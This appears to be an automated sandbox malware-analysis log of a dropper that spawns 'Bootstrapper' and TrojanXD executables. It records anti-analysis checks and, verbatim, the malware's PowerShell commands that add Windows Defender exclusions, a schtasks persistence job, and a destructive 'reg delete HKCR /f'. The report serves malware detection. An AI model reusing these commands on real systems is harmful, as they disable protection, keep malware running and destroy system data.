                      Source: C:\Users\user\AppData\Roaming\explorer.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373BB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6373BB190
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373A40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6373A40BC
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373CFCA0 FindFirstFileExA,0_2_00007FF6373CFCA0
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DCECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,33_2_00007FF789DCECE0
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DB647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,33_2_00007FF789DB647C
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DE3130 FindFirstFileExA,33_2_00007FF789DE3130
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373C16A4 VirtualQuery,GetSystemInfo,0_2_00007FF6373C16A4
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599765Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599436Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599327Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599218Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599108Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598890Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598781Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598662Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598531Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598417Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598311Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598203Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598094Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597981Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597863Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597544Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597422Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597312Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597203Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597093Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596984Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596873Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596765Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596654Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596546Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596437Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596321Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596218Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596109Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595999Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595890Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595781Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595668Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595562Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595453Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595326Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 594906Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 594796Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599891
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599772
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599653
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599532
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599297
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599172
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599063
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598938
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598813
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598688
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598563
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598452
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598344
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598230
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598110
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598000
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597891
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597766
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597656
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597547
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597438
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597313
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597190
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597065
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596939
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596625
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596507
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596391
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596282
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596157
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596032
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595907
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595797
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595688
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595563
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595438
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595313
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595188
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595078
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594969
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594844
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594735
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594610
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594485
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594368
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594259
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 593766
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 593633
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 593492
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 564023
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
                      Source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
                      Source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
                      Source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
                      Source: Bootstrapper.exe, 00000003.00000002.2139127461.00000247D7D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
                      Source: Bootstrapper.exe, 00000003.00000002.2132346409.00000247BD99E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRRp
                      Source: svchost.exe, 0000001F.00000002.4501089689.0000014635854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: BootstrapperV21.exe, 00000002.00000002.4851659921.000000001B765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll60
                      Source: svchost.exe, 0000001F.00000002.4496827285.000001463022B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW l
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2509078792.000001AC8CA8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess queried: DebugPort
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeCode function: 39_2_00000207DE5869B2 rdtsc 39_2_00000207DE5869B2
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373C76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6373C76D8
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373D0D20 GetProcessHeap,0_2_00007FF6373D0D20
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\explorer.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\explorer.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\explorer.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373C76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6373C76D8
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373C2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6373C2510
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373C3354 SetUnhandledExceptionFilter,0_2_00007FF6373C3354
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373C3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6373C3170
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DD6940 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00007FF789DD6940
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DD5CE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_00007FF789DD5CE0
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DDAC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00007FF789DDAC68
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DD6B24 SetUnhandledExceptionFilter,33_2_00007FF789DD6B24
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: Process Memory Space: BootstrapperV1.22.exe PID: 7376, type: MEMORYSTR
                      Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe'
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe'
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373BB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6373BB190
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeProcess created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BootstrapperV21.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Users\user\AppData\Local\Temp\voosiq.exe "C:\Users\user\AppData\Local\Temp\voosiq.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe" --oldBootstrapper "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" --isUpdate trueJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeProcess created: C:\Users\user\AppData\Local\Temp\TrojanXD.exe "C:\Users\user\AppData\Local\Temp\TrojanXD.exe"
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs"
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k reg delete HKCR /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKCR /f
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373D58E0 cpuid 0_2_00007FF6373D58E0
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF6373BA2CC
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: GetLocaleInfoW,GetNumberFormatW,33_2_00007FF789DCDE44
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeQueries volume information: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
